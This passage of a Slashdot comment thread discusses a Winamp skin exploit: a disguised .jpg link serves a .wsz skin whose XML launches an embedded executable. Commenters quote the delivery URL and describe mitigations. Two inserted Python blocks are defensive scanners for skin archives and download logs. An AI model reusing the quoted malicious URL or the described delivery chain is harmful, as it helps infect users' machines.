      $x=~y+ -xz+\0-Tx+;print$_^chop$me for split'',$x;
  10. Simple solutions by JLSigman · · Score: 5, Informative

    Don't get your skins from anyone but WinAMP.

    OR

    Don't use skins at all.

    --
    -jls
    Techno-pagan
    1. Re:Simple solutions by fulana_lover · · Score: 3, Informative

      the article mentioned specifically the problem is that wsz skins are able to escape IE's security policies and run as local computers when sent as XML files, so a malicious website (or HTML email, message board posting, etc) could automatically run the exploit without even your knowledge... time to uninstall winamp...

    2. Re:Simple solutions by MalaclypseTheYounger · · Score: 0

      OR use iTunes. As a non-mac user and all-around Macintosh-detester, iTunes is pretty damned slick.

      No issues with it so far, and it handles my 2000+ MP3 database with ease. (Last time I used WinAmp... in the great words of Jon Stewart... eh, not so great-- very choppy).

      --
      Check out the best P2P sharing website: MEDIACHEST.COM
    3. Re:Simple solutions by linzeal · · Score: 1

      This could be hidden in a page that is completely unrelated to winamp or skinning and it would still work.

    4. Re:Simple solutions by Anonymous Coward · · Score: 0

      From a quick review of the winamp forum, installing a skin isn't how it's propagated.

      It gets winamp to run executable code embedded in the skin.xml file, but the whole thing is an exploit of your browser and mime types.

      That is, you think you're going to see a jpeg, your browser sees javascript that forwards it to a php page that sends a winamp file.

      Your browser sees it's a winamp file, sends it to winamp, who then runs the code.

      If you use winamp and your browser's set to open winamp-associated stuff, you're at risk it looks like.

    5. Re:Simple solutions by _Sprocket_ · · Score: 5, Informative


      Don't get your skins from anyone but WinAMP.


      That would be fine advise if the victims knew they were downloading a Winamp skin. The link, however, looks like it is an image file:
      http://socold.de/stuff/schnappi_death.jpg <----- LOOOOOOOOOOOOOOOOOOOOL
      Going clicky-clicky (or otherwise following the link) exacuted a PHP script which would serve up a winamp skin. Since many users have their browsers automagically handle Windamp skins, it would immediately get handed off to Winamp to execute. The skin linked to several files that eventually called an executable within the skin package which in turn loaded one's mIRC client with a script that spat out the above message.

      The victims probably didn't know what hit them.
    6. Re:Simple solutions by maximilln · · Score: 2, Insightful

      who then runs the code

      Winamp parses the XML file which contains an embedded link to the .exe in the Winamp skin archive.

      Why are markup languages allowed to link to executables? Allowing arbitrary hotlinks to an untrusted location without proper validation is a security hole the size of an aircraft carrier.

      --
      +++ATHZ 99:5:80
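The mechanism described in the comment above can be checked for before a skin is ever opened. This is an added example, not part of the original thread and not Winamp's code: it opens a skin package (a ZIP archive) and reports members that carry an executable header or an unexpected extension, and which XML member refers to them. The extension allow-list, the function names and the sample archives are assumptions constructed for illustration.

```python
import io
import zipfile
from pathlib import PurePosixPath

# Assumption: file types a skin plausibly needs (bitmaps, cursors, XML, text, fonts).
ALLOWED_EXT = {".bmp", ".png", ".jpg", ".gif", ".cur", ".xml", ".txt", ".ini", ".ttf"}
PE_MAGIC = b"MZ"            # every Windows PE executable starts with these bytes
MAX_XML_BYTES = 1 << 20     # cap how much of each XML member is read


def _read(zf, name, limit):
    """Read at most `limit` bytes of one archive member."""
    with zf.open(name) as fh:
        return fh.read(limit)


def scan_skin(data):
    """Return a sorted list of (member, reason) findings for a skin archive."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return [("<archive>", "not-a-zip")]
    findings = set()
    flagged = {}                       # lower-cased basename -> member name
    with zf:
        members = [n for n in zf.namelist() if not n.endswith("/")]
        for name in members:
            path = PurePosixPath(name.replace("\\", "/"))
            # A member must not be able to land outside the skin directory.
            if path.is_absolute() or ".." in path.parts:
                findings.add((name, "path-escapes-skin-dir"))
            # Check content first: a renamed executable keeps its header.
            if _read(zf, name, 2) == PE_MAGIC:
                findings.add((name, "pe-header"))
                flagged[path.name.lower()] = name
            elif path.suffix.lower() not in ALLOWED_EXT:
                findings.add((name, "unexpected-extension"))
                flagged[path.name.lower()] = name
        # Second pass: which XML members point at a flagged file?
        for name in members:
            if not name.lower().endswith(".xml"):
                continue
            text = _read(zf, name, MAX_XML_BYTES).decode("utf-8", "replace").lower()
            for base, target in flagged.items():
                if base in text:
                    findings.add((target, "referenced-by:" + name))
    return sorted(findings)


def build_archive(members):
    """Build an in-memory ZIP from a {name: bytes} mapping (test helper)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples: placeholder bytes only, not real skins or executables.
CLEAN = build_archive({"skin.xml": b"<skin/>", "main.bmp": b"BM" + bytes(16)})
SUSPECT = build_archive({
    "skin.xml": b'<skin><item file="helper.exe"/></skin>',
    "main.bmp": b"BM" + bytes(16),
    "helper.exe": b"MZ" + bytes(16),
    "about.png": b"MZ" + bytes(16),   # executable header behind an image name
})

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN), ("suspect", SUSPECT)):
        print(label, scan_skin(blob))
```

A classic skin that is only image maps comes back with no findings; anything else is worth a look before it is handed to the player.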
    7. Re:Simple solutions by Anonymous Coward · · Score: 0

      No... I'm not that desperate yet.

    8. Re:Simple solutions by nkh · · Score: 2, Interesting

      It's too late for me to post this but there is a plug-in on the Winamp web site that is developed by a spyware company (can't remember the name): the plug-in shows you a girl dancing and of course it's sending a lot of packets through the internet. The plug-in is available on Winamp's web site!

    9. Re:Simple solutions by Anonymous Coward · · Score: 0
      LOOOOOOOOOOOOOOOOOOL

      ?

      It wasn't that funny.

      paynoattentiontomeiamjustgettingthelowercasetoca psratiodown

    10. Re:Simple solutions by Ziffy · · Score: 1

      I have around 1500 (mp3/ogg/flac/mpc/mod/spc) files in my playlist, and Winamp still handles perfectly. My system isn't exactly bleeding-edge, either.

    11. Re:Simple solutions by Anonymous Coward · · Score: 0

      What do you want him to do, lie? And make up some random message rather than the one the worm gives you?

    12. Re:Simple solutions by Anonymous Coward · · Score: 0

      You should be "exacuted" for your atrocious spelling.

    13. Re:Simple solutions by bigberk · · Score: 2, Informative
      The link, however, looks like it is an image file:
      I wrote a small windows program called popURL that lets you quickly get info on a URL such as the file size, MIME type (important obviously), even software running on web server (IIS etc.)
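The same idea, comparing what a link looks like with what the server actually sends, can be applied to proxy or web-filter logs. This is an added example, not popURL's code and not part of the thread: it classifies (URL, response header) records and picks out skin packages delivered behind a URL that looks like something else. The records are constructed, the function names are hypothetical, and the two skin MIME types are an assumption to adjust locally.

```python
from email.message import Message
from pathlib import PurePosixPath
from urllib.parse import urlsplit

IMAGE_EXT = {".jpg", ".jpeg", ".png", ".gif", ".bmp"}
SKIN_EXT = {".wsz", ".wal"}          # the skin extensions named in the thread
# Assumption: MIME types commonly associated with Winamp skins; adjust locally.
SKIN_TYPES = {"interface/x-winamp-skin", "interface/x-winamp3-skin"}


def _ext(name):
    """Lower-cased extension of a path or file name, '' if there is none."""
    return PurePosixPath(name).suffix.lower() if name else ""


def _disposition_filename(value):
    """Extract filename= from a Content-Disposition header value."""
    if not value:
        return None
    msg = Message()
    msg["Content-Disposition"] = value
    return msg.get_filename()


def classify(url, headers):
    """Return the list of reasons this response deserves attention."""
    h = {k.lower(): v for k, v in headers.items()}
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    url_ext = _ext(urlsplit(url).path)
    served_ext = _ext(_disposition_filename(h.get("content-disposition")))
    reasons = []
    # Anything that will be handed to the skin handler, however it is named.
    if ctype in SKIN_TYPES or served_ext in SKIN_EXT or url_ext in SKIN_EXT:
        reasons.append("skin-package")
    # The link promised an image but the server declared something else.
    if url_ext in IMAGE_EXT and not ctype.startswith("image/"):
        reasons.append("image-url-nonimage-type")
    # The server renamed the download to a different extension.
    if served_ext and url_ext and served_ext != url_ext:
        reasons.append("filename-differs-from-url")
    return reasons


def disguised_skins(records):
    """URLs that deliver a skin package while presenting as another type."""
    hits = []
    for url, headers in records:
        reasons = classify(url, headers)
        if "skin-package" in reasons and len(reasons) > 1:
            hits.append(url)
    return hits


# Constructed records, as a proxy log might provide them.
RECORDS = [
    ("http://example.test/pics/cat.jpg", {"Content-Type": "image/jpeg"}),
    ("http://example.test/stuff/funny.jpg",
     {"Content-Type": "interface/x-winamp-skin",
      "Content-Disposition": 'inline; filename="funny.wsz"'}),
    ("http://example.test/skins/classic.wsz",
     {"Content-Type": "application/octet-stream"}),
    ("http://example.test/pics/gone.jpg", {"Content-Type": "text/html; charset=utf-8"}),
]

if __name__ == "__main__":
    for url, headers in RECORDS:
        print(url, classify(url, headers))
    print("disguised:", disguised_skins(RECORDS))
```

An image URL that returns an HTML error page is flagged as a mismatch but not as a disguised skin, which keeps the second list short enough to act on.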
    14. Re:Simple solutions by gordgekko · · Score: 1

      Eh? I have a 4000+ MP3 database that WinAmp has no problem with, and my PC is hardly bleeding edge.

      --
      You want to know who isn't running Firefox 2.x? They spell it "definately" and "rediculous".
    15. Re:Simple solutions by recursiv · · Score: 1

      But a local hard drive is considered a trusted location.

      --
      I used to bulls-eye womp-rats in my pants
    16. Re:Simple solutions by _Sprocket_ · · Score: 1

      It may not be that funny. But it is a direct quote.

    17. Re:Simple solutions by Anonymous Coward · · Score: 0

      Maybe he tried WinAmp 3, Winamp 3 used to run like crap on my work machine, while at the same time Winamp 2 was running perfectly on my machine at home which was about 3 years older.

  11. As long as... by Anonymous Coward · · Score: 3, Funny

    Just as long as the exploit isn't used to install SP2 we're all safe.

    1. Re:As long as... by Anonymous Coward · · Score: 0

      funny?!?!

      since when is trolling worth a +5 funny???

      Stop with the hate group propaganda already, this is really old and tiresome, as more and more of the MATURE slashdot crowd leave for another site that acts mature and helpful no matter what the OS is.

  12. Easy fix by shams42 · · Score: 0

    It seems that this is easy to fix for now by simply configuring your firewall to not allow Winamp to access the network.

    1. Re:Easy fix by Robotech_Master · · Score: 2, Insightful

      Of course, then you can't listen to Internet radio...

      --
      Editor Emeritus and Senior Writer, TeleRead.org
    2. Re:Easy fix by MyDixieWrecked · · Score: 1
      It seems that this is easy to fix for now by simply configuring your firewall to not allow Winamp to access the network.


      but um... what about listening to internet radio stations? how about when you use it to sample music online? a lot of those online music sites (mp3.com for example) have a .m3u file to preview the songs in winamp.
      --



      ...spike
      Ewwwwww, coconut...
    3. Re:Easy fix by mlyle · · Score: 2, Informative

      Wrong. All you need to do is open a wsz file in order to get exploited-- subsequent network access isn't required. And internet explorer is happy to auto-open that wsz file for you.

  13. All versions are affected? by httpamphibio.us · · Score: 4, Informative

    The Secunia.com link in the profile says that only Winamp 3.x and 5.x. But doesn't mention 2.x... the vast majority of Winamp users I know don't use 3.x or 5.x due to the massive feature bloat.

    Is 2.x actually susceptible or is the submitter incorrect?

    --
    sig.
    1. Re:All versions are affected? by Will+Fisher · · Score: 5, Informative

      Winamp 2 is NOT affected. Winamp 5 Lite is also NOT affected.

      If you unchecked "Modern Skin Support" in the installer you are also NOT affected.

      You can even remove Modern Skin Support just by renaming Program Files\Winamp\Plugins\gen_ff.dll to gen_ff.dll.old. This will remove the exploit.

      If you fix this way, you will only be able to use classic skins.

    2. Re:All versions are affected? by Anonymous Coward · · Score: 0

      Version 5 does not have a massive feature bloat: it has elements of 3 without the bloat of 3.

    3. Re:All versions are affected? by lotsofno · · Score: 5, Informative

      .
      What many people don't realize is that Winamp 5 IS Winamp 2 (Check out this article.). It's the same code, but with extra plug-ins bundled in. The user can choose which plug-ins or features he wants to include or not include when installing. So I'm not sure how you could call the application bloated when the app installs only what the user feels he or she needs.

    4. Re:All versions are affected? by Anonymous Coward · · Score: 0

      YEAH BAYBEEE!!!

      Winamp 2.x r0x0rz! the later winamps are way too big and obnoxious. The only problem is that winamp 2.x keeps bugging me to update to later versions...

    5. Re:All versions are affected? by Carnildo · · Score: 1

      Winamp 5 is Winamp 2 + Winamp 3's skinning abilities. Hence the name.

      --
      "They redundantly repeated themselves over and over again incessantly without end ad infinitum" -- ibid.
    6. Re:All versions are affected? by Anonymous Coward · · Score: 0

      I thought it was because the number 4 is an unlucky number in many parts of Asia.

    7. Re:All versions are affected? by traveyes · · Score: 1


      fwiw:

      winamp 5 at this moment, minimized (no support for "modern skins") is using 1,432K of memory.

      wmplayer, playing the same song, in compact mode, minimized, is at 12,788K.

      and yes, smartasses, it sounds weird with the same song playing twice... way out of phase.

      .

    8. Re:All versions are affected? by Alsee · · Score: 1

      The obvious workaround seems to be to go into Folder Options - File Type associations and just delete the WSZ association (winamp extension installation file).

      Poof! No more skin files launch!

      Why hasn't anyone else suggested this? Am I missing something here?

      -

      --
      - - You can't take something off the Internet! That's like trying to take pee out of a swimming pool.
    9. Re:All versions are affected? by rmull · · Score: 1

      Also for what it's worth, those numbers probably don't mean much. If it's what you get out of windows task manager, then they indicate the size of the program's virtual address space, which includes pages from libraries they use that have been mapped in. Which means two things: 1) the memory may be shared with other apps, and 2) the memory may not even be in physical memory, but on disc and never actually loaded.

      And those numbers do make sense - winamp probably uses its own libraries for mpeg decoding and so on, whereas I'm sure wmp uses directx stuff.

      --
      See you, space cowboy...
  14. fix? by Anonymous Coward · · Score: 0

    So what's the fix?
    (Beside removing winamp)

  15. All Versions? by (54)T-Dub · · Score: 4, Informative
    I know that a lot of us "old school" winamp users still use the classic winamp lite v2.81 [plug] A much lighter version of the software[/plug]. The article states that it affects:
    • WinAMP 3.x
    • Winamp 5.x
    --

    "I can not bring myself to believe that if knowledge presents danger, the solution is ignorance" - Isaac Asimov
    1. Re:All Versions? by jdrake · · Score: 1

      yup, 3.x+ is just broken, I love my 2.xx I'll never change!

      thank you, that is all.

      --
      "...and I am _not_ intoxicated... YET!" --John Wayne
    2. Re:All Versions? by Jacer · · Score: 1

      I assume you meant 2.91. It was the last stable, bloat free release. Plus it supports album list, instead of that god awful media library trash that comes with the new stuffs. Yeah, I rant, but it's ok.

      --
      --fetch daddy's blue fright wig, i must be handsome when i release my rage
    3. Re:All Versions? by CritterNYC · · Score: 1

      yup, 3.x+ is just broken, I love my 2.xx I'll never change!

      Yeah, 3.x was a mess... but 5.x is based on the 2.x version with the modern skin support added in. On my (albeit fast) PC it routinely sits in the background playing MP3s consuming a bit over 5mb of RAM and using 0% CPU.

      The Media Library is decent, like iTunes but without genre browsing, and far more customizable. And it isn't a complete piece of shite like iTunes for Windows is.

    4. Re:All Versions? by Anonymous Coward · · Score: 0

      weee....2.93 isn't affected.

  16. i hate skins by avandesande · · Score: 2, Interesting

    am i the only person that finds ever changing interfaces an annoyance??

    --
    love is just extroverted narcissism
    1. Re:i hate skins by t_allardyce · · Score: 1

      no you're not.

      --
      This comment does not represent the views or opinions of the user.
    2. Re:i hate skins by Anonymous Coward · · Score: 0

      Skins aren't for interfaces, rather they are eye candy for the desktop. The keyboard is all the interface I need.

    3. Re:i hate skins by Rosco+P.+Coltrane · · Score: 1

      am i the only person that finds ever changing interfaces an annoyance??

      Apparently not.

      --
      "A door is what a dog is perpetually on the wrong side of" - Ogden Nash
    4. Re:i hate skins by Anonymous Coward · · Score: 0
      am i the only person that finds ever changing interfaces an annoyance??
      I'm guessing you're still using the default desktop wallpaper?
    5. Re:i hate skins by avandesande · · Score: 1

      yeah and classic interface
      no transitions
      etc etc

      --
      love is just extroverted narcissism
    6. Re:i hate skins by Anonymous Coward · · Score: 0

      you are not alone

    7. Re:i hate skins by 88NoSoup4U88 · · Score: 2, Informative

      It's not about everchanging ; it's about customizing to your own use.

    8. Re:i hate skins by gwernol · · Score: 2, Interesting

      am i the only person that finds ever changing interfaces an annoyance??

      Ever changing interfaces would indeed be an annoyance, but the point of skins is to let you find the UI you like and stick with it. For any individual user the UI is the same (unless you really want to keep changing it) it's just that different users can have different UIs.

      It's a bit like the "bloat" in large applications like Word. Of course most users only use 10-20% of Word's features, but each person can use a subtly different 10-20%. You choose to learn the subset of features that are useful to you and ignore the rest. Those others are only a minor distraction.

      --
      Sailing over the event horizon
    9. Re:i hate skins by topher1kenobe · · Score: 3, Interesting

      I love skins. I pick one and use it for years before switching. Skins allow people to pick an interface they like, something that fits into their desktop style, and leave it there.

      I don't go with random skins, or frequently changing skins. I just browse the library, pick a good one, and stick with it.

      --

      yadda

    10. Re:i hate skins by blixel · · Score: 2, Insightful

      am i the only person that finds ever changing interfaces an annoyance??

      Why does it have to be ever changing? Find the look you like and stick with it. If that happens to be the default, great.

    11. Re:i hate skins by avandesande · · Score: 1

      whatever just put regular buttons on the goddam thing. maybe i should have phrased it 'i dont need distracting visual garbage on my computer'

      --
      love is just extroverted narcissism
    12. Re:i hate skins by Frnknstn · · Score: 1

      Are you a troll or just an idiot? A background isn't an interface. Interfaces are functional, backgrounds are decorative.

      --
      If it's in you sig, it's in your post.
    13. Re:i hate skins by asdfghjklqwertyuiop · · Score: 2, Insightful

      Skins allow people to pick an interface they like, something that fits into their desktop style, and leave it there.


      Pick an interface they like? Hah. I wish I could pick the skin I like: None at all. Something that makes the application's interface look and work exactly like every other application I run instead of some incomprehensible and unusable artistic garbage.
    14. Re:i hate skins by wan-fu · · Score: 1

      Why is the parent modded insightful? "None at all" isn't really a choice. A program has to look like something, skinned or not. And it's a matter of every user for the application to look "exactly like every other application" that he might be running. The default Winamp skin sure as hell doesn't look anything like any version of Windows. Perhaps you could use some of that "unusable artistic garbage" to make it look and work like all the other programs you run.

    15. Re:i hate skins by It'sYerMam · · Score: 1

      What if people want a bit of art to go with their tunes? Art and sound go hand in hand, which, I suppose is one of the themes behind the iPod.
      I personally think that media apps deserve to look as good as their physical counterparts. You can get some nice skins for GTK, QT, and the rest, but they DO need to be functional and easy to use. The Media player is going to be as easy to use with or without its skin, it's not like the buttons disappear.

      --
      im in ur .sig, writin ur memes.
    16. Re:i hate skins by default+luser · · Score: 1

      Yeah, I have been using the same skin since 2000...MetAmpMorphosis by Zombie. Even works with XMMS, hurray for standards!

      Anyway, a hack like this wouldn't work with older v2 skins because they're just image maps.

      --

      Man is the animal that laughs.
      And occasionally whores for Karma.

    17. Re:i hate skins by asdfghjklqwertyuiop · · Score: 1

      "None at all" isn't really a choice. A program has to look like something, skinned or not.


      Sure it is. None at all means just display the application's widgets the standard way for that platform. Don't apply any skin. Just let the GUI toolkit draw the widgets the way it wants to (ie, according to my global preferences). Don't try to do something fancy and different. Or at least give me the option of making your application act standard.


      And it's a matter of every user for the application to look "exactly like every other application" that he might be running.


      And that's why we have OS-wide (or at least GUI toolkit-wide) themes for the interface. These are vastly superior to per-application skins for tons of reasons, including the following:


      Perhaps you could use some of that "unusable artistic garbage" to make it look and work like all the other programs you run.


      Actually I can't. I can't make a winamp skin that will be drawn bigger or smaller depending on whether I'm looking at my 128dpi laptop lcd panel or much lower dpi CRT display (a la Mozilla or Qt or windows).

      And furthermore, is everyone supposed to create a theme for every application they use that makes it behave according to their preferences? I don't have time for that. I'll just use something that doesn't use skins (if I can find it. For whatever reason the authors of practically every multimedia oriented app find it necessary to do skins).

      And I'm supposed to adjust the themes in every single application every time I change some settings in the rest of my system?

    18. Re:i hate skins by Anonymous Coward · · Score: 0

      I like to make my winamp skin, desktop theme, and wallpaper all match.

    19. Re:i hate skins by asdfghjklqwertyuiop · · Score: 1

      What if people want a bit of art to go with their tunes?


      That's fine. The question here is what if people don't? What if they just want their tunes and not the funky GUI? If the applications weren't skinned at all, you'd always have OS themes that you could use to spruce up your system.


      I personally think that media apps deserve to look as good as their physical counterparts.


      The problem is that the apps are in a totally different medium than their physical counterparts. Some things that may work well on a physical audio device are completely stupid on a software program. For example, the Sonique media player for windows uses a radial volume control (a dial) - just like you'd find on a physical radio. However there's a reason you almost never see dials like this on software interfaces: because they really suck on computer screens. You have to manage mouse movement in two dimensions while using the widget and it just feels awkward and much harder to use than a slider. The authors of the program captured the appearance of the physical device, but the actual experience of using it is totally different and vastly inferior.


      You can get some nice skins for GTK, QT, and the rest, but they DO need to be functional and easy to use.


      Agreed, and for the most part they are.


      The Media player is going to be as easy to use with or without its skin, it's not like the buttons disappear.


      Funny you should mention disappearing buttons. One particular skinned app that I hated using came with a skin that had a few buttons designed such that I didn't even realize they were buttons. The skin was so poorly designed that they effectively made the buttons disappear to the inexperienced user.
    20. Re:i hate skins by Anonymous Coward · · Score: 0

      You assume there is a good skin out there somewhere. I've yet to find one for any app I use. This is a pretty good observation of the user experience provided by most "good" themes.

    21. Re:i hate skins by BillyBlaze · · Score: 1

      If you want a good music player without skins, you should try FooBar2000.

    22. Re:i hate skins by EvilIdler · · Score: 1

      The "none at all" option is Foobar 2000.
      Lean player, does what it's told.

    23. Re:i hate skins by wan-fu · · Score: 1

      While I think your argument has merit and I definitely agree with some of your points, I think it's a bit short-sighted. You bring it up yourself when you mention "OS-wide (or at least GUI toolkit-wide) themes" - this is why it's great to be able to skin things. On my computer, I use KDE but I also run a bunch of Gnome applications. It's great to able to run the GTK-QT theme against all my programs. Similarly, in Windows, if I were to run some GTK program it wouldn't look as great if I weren't provided the opportunity to at least change the skin of the program to a Windows look. You might argue that this isn't skinning but instead "theming" a GUI toolkit, but I would say that this is just an example of a skin applied to a bunch of programs.

    24. Re:i hate skins by Anonymous Coward · · Score: 0

      The point is that 'theming' as you say is the appropriate way to do this - 'skins' that affect one application only are emphatically NOT. They make my skin crawl. I'm using Winamp 2 on my windows box btw, and I just checked, it's NOT vulnerable to this exploit (and it would be very odd if it were, since there's no MSHTML crap allowed on my window box, it's kept completely uninfected by IE.) I searched and searched until I found a 'Windows' theme and that's what it's run for several years now. It's still annoying though, because of course it's only mimicking the standard toolbox for the platform, not actually using it, and this shows sometimes.

    25. Re:i hate skins by It'sYerMam · · Score: 1
      So get a better skin? See, there's the beauty of the system - you can download another one! There's no point in saying "In one skin there was nothing but blackness" because it was probably done by some l4m3r who thought d00d, i cNa m4k3 teh skinz0rs!!

      On a related note, you can still get media players of your preferred kind - try rhythmbox. Even if you prefer XMMS, you can often find a skin that's close to your GTK/QT skin, or - design your own!

      --
      im in ur .sig, writin ur memes.
    26. Re:i hate skins by Bilange · · Score: 1

      Interfaces are functional, backgrounds are decorative.

      I have to disagree here (for the interface part)

      Let's take Winamp example, while we're talking about it.

      In the 1.x and 2.x days, it doesn't matter what skin you are using: all the functionality won't move by a pixel.

      On the other hand, with today's Winamp 3.x and 5.x, the buttons, sliders, and whatever components are placed wherever the skin creator wants it to be located, and in my book I call that decorative in some way - having to search for the "load a file" button every time I load a new skin is somewhat a pain. And having a skin that takes half of the screen isn't really "functional", but rather annoying.

      My two (canadian) cents.

      --
      "...a generation of kids has grown up thinking Trance is the shittiest music since country and western." - Paul van Dyk
    27. Re:i hate skins by DNS-and-BIND · · Score: 1

      I remember when Quicktime's interface came out, it looked all artsy and jazzy, only it violated every rule in the book about Apple interface design, and was widely trashed by the Mac faithful.

      --
      Shutting down free speech with violence isn't fighting fascism. It IS fascism!
    28. Re:i hate skins by asdfghjklqwertyuiop · · Score: 1

      So get a better skin? See, there's the beauty of the system - you can download another one!


      Well the point is even if I found a nice looking skin, there are still things that skin doesn't do that a standard UI doesn't. It doesn't obey my global settings for things like display DPI and font sizes. I've never tried to design a skin before, but as far as I can tell they are all just a bunch of bitmaps. Themes are more advanced. They give you the prettiness of skins and the flexibility and functionality of a plain GUI.

    29. Re:i hate skins by Frnknstn · · Score: 1

      You are broadly correct, but you missed the point.

      The first post complained about the changing interfaces. Somebody replied in a post that basically equated interfaces, decorative or not, with backgrounds.

      My post refuted that point. Interfaces may be decorative, but if they do not actually DO anything (are not functional), they are not interfaces. If backgrounds have interactive, functional elements, they are not backgrounds, but interfaces.

      --
      If it's in you sig, it's in your post.
  17. Redmond school of engineering by Rosco+P.+Coltrane · · Score: 4, Interesting

    Program skins with "browser tags" and "embedded xml"? sheesh, what next, word processor documents that have executable code inside?

    --
    "A door is what a dog is perpetually on the wrong side of" - Ogden Nash
    1. Re:Redmond school of engineering by SCVirus · · Score: 1

      Ever heard of Microsoft's Doc format?

    2. Re:Redmond school of engineering by Anonymous Coward · · Score: 0

      Have you heard of the word "dense"? That's what the guy was talking about...

    3. Re:Redmond school of engineering by cygnusx · · Score: 1

      > Program skins with "browser tags" and "embedded xml"?

      Believe it or not, Mozilla uses the same technique. Not all of us believe application design reached its pinnacle with ed, you know.

  18. Does anyone still use winamp? by Anonymous Coward · · Score: 0

    With all the malware packed into the current versions, I thought everyone had jumped ship or stopped upgrading at 1.x long ago.

  19. 2.91 by Anonymous Coward · · Score: 0
    The good old 2.91 is not affected though AFAIK.

  20. Fixes... by xdeadbeef · · Score: 5, Informative
    • Use Firefox as your default browser (which won't auto-launch skins), or...
    • don't install modern skin support in winamp (or delete plugins\gen_ff.dll if you already are installed), or...
    • get winamp 5.05 when it comes out in a day or two.
    1. Re:Fixes... by Thrymm · · Score: 5, Insightful

      Amen! I use it to play music, I don't look at the damn thing. I know some people love skins, for me I don't need it, just need to hear the music not see the colors!

    2. Re:Fixes... by Egekrusher2K · · Score: 3, Informative

      According to the Winamp forums, the default Firefox configuration is just as susceptible to this exploit as IE is. You can change your settings in either browser so that it is not affected by your exploit.

      Fortunately, I use Mozilla. :)

      --
      Listen to my experimental-industrial-techno!
    3. Re:Fixes... by Chelloveck · · Score: 1
      Amen! I use it to play music, I don't look at the damn thing. I know some people love skins, for me I don't need it, just need to hear the music not see the colors!

      Right on, man! That's what the drugs are for...

      --
      Chelloveck
      I give up on debugging. From now on, SIGSEGV is a feature.
  21. Winamp Unlimited Has The Full Report by lotsofno · · Score: 5, Informative

    .

    Winamp Unlimited has a friendly summary on how the worm infects the user, as well as steps one can take to avoid being infected.

    This is also worth noting: "The Nullsoft team have already implemented a patch for this exploit, which will be included in a very-near future release 5.04a or 5.05. This next version is already in its third beta stage, and will include several other unrelated changes/fixes."

    1. Re:Winamp Unlimited Has The Full Report by bot24 · · Score: 1

      Will this patch involve extracting the files onto a local webserver so that the extracted files will appear to be in the internet zone? How would Nullsoft patch a bug that is embedded in a Microsoft library? Deleting files with known extensions could break some skins because this might be exploitable through VBScript too.

  22. Nyah Nyah, I'm immune... by praedictus · · Score: 0, Troll

    ...Coz I use XMMS for my MP3 and FLAC goodness. Mind you it is supposed to be able to use WinAmp skins...

    --
    Watashi wa chikyubutsurigakusha desu.
  23. This is absolutely nothing to worry about... by Rahga · · Score: 0, Offtopic

    Since XP Service Pack 2 came out, it's not like any of those Windows machines can connect to the internet anyway....

  24. Just use windows media player. by Anonymous Coward · · Score: 0, Offtopic

    Windows Media Play works fine.

    Seriously, Microsoft Office and Internet Explorer seem to work just fine for me.

    Plus, they all work on my Mac :)

    1. Re:Just use windows media player. by name773 · · Score: 1, Redundant

      isn't that blasphemy or something?

  25. Re:Are you from a swing state? by Anonymous Coward · · Score: 0

    Here's how it works, you vote for who I want and I vote for who you want

    Aah, but I'll want some proof you voted for who I wanted. So, be sure to keep your proof receipt from the Diebold machine!

    No wait...

  26. Re:Are you from a swing state? by Anonymous Coward · · Score: 0

    I sympathize with your cause, but I don't think my casting a vote for Kodos for you is really going to affect the election all that much, sorry.

  27. Just another reason to use iTunes, I guess by Robotech_Master · · Score: 0, Troll

    I used to be a big fan of Winamp...but then I switched to iTunes and never looked back. Guess that's a good thing.

    --
    Editor Emeritus and Senior Writer, TeleRead.org
    1. Re:Just another reason to use iTunes, I guess by Anonymous Coward · · Score: 3, Funny
      I used to be a big fan of Winamp...but then I switched to iTunes and never looked back. Guess that's a good thing.
      Good thing you never looked back. We're all pointing and laughing at you.
    2. Re:Just another reason to use iTunes, I guess by Jaysyn · · Score: 1

      Geiss, Milkdrop, R4, KataFX, Smoke & ZMatrix.

      6 good reasons to stay with WinAMP.

      Jaysyn

      --
      There is a war going on for your mind.
    3. Re:Just another reason to use iTunes, I guess by Anonymous Coward · · Score: 2, Insightful

      You are aware iTunes installs massive (many MB) services that start at bootup you have no need of don't you? You're aware it blindly installs the iPod service, whether you have an iPod or not right? If I remember the last time I looked at it ALSO installed Quicktime, which is one of the worst behaved Windows installs of a media utility in well, pretty much ever. And Quicktime btw, also installs services you have absolutely no need of.

      Memory is cheap, but that doesn't mean I want Apple deciding it can just use mine for code that never executes (or even worse, executes when I don't need it).

    4. Re:Just another reason to use iTunes, I guess by LilMikey · · Score: 1

      I call BS. Real easily has Apple beat in the "worst behaved Windows installs of a media utility in well, pretty much ever" category. But we'll give them a close second.

      --
      LilMikey.com... I'll stop doing it when you sto
    5. Re:Just another reason to use iTunes, I guess by That's+Unpossible! · · Score: 2, Informative

      Good thing you never looked back. We're all pointing and laughing at you.

      Seriously man... posting this comment in a thread detailing an exploit in your elitist program is kinda... retarded.

      WinAmp exploits: 2 (that I know of)
      iTunes exploits: 0

      Let's keep score.

      --
      Ironically, the word ironically is often used incorrectly.
    6. Re:Just another reason to use iTunes, I guess by Anonymous Coward · · Score: 2, Funny

      Yes, let us keep score.

      Winamp gayness: 0
      iTunes gayness: 1,000,000,000,OMG,LOL,000

    7. Re:Just another reason to use iTunes, I guess by Phroggy · · Score: 1

      You are aware iTunes installs massive (many MB) services that start at bootup you have no need of don't you?

      Some of these are required to make certain features work. If you don't want those features, fine - disable the services.

      You're aware it blindly installs the iPod service, whether you have an iPod or not right?

      Of course Apple does this to make it easier for iPod owners to use their iPods, and a lot of people are buying iPods. If you don't own one and don't plan to buy one (and don't have friends who own them), disable the service!

      If I remember the last time I looked at it ALSO installed Quicktime, which is one of the worst behaved Windows installs of a media utility in well, pretty much ever.

      There's a damn good reason why it installs QuickTime. QuickTime is a media layer. Guess what iTunes does? Plays media. Guess how? By using QuickTime. Think of iTunes as simply a shell on top of QuickTime.

      Worst behaved in what way? The QuickTime Pro $30 upgrade nag screen? Yeah, that sucks ass. Tip: set your clock forward several years, launch QuickTime Player, click "Later", fix your clock. When you click "Later", it adds a registry entry with tomorrow's date, and won't bug you again until then.

      Oh yeah, and I think it drops a "Get QuickTime Pro" movie on your desktop. At least it used to do that. Annoying, but I believe the above trick works with that too.

      And Quicktime btw, also installs services you have absolutely no need of.

      Click the systray icon, open QuickTime Preferences, choose Browser Plugin from the menu, uncheck the last box. Why it's listed under Browser Plugin, I don't know.

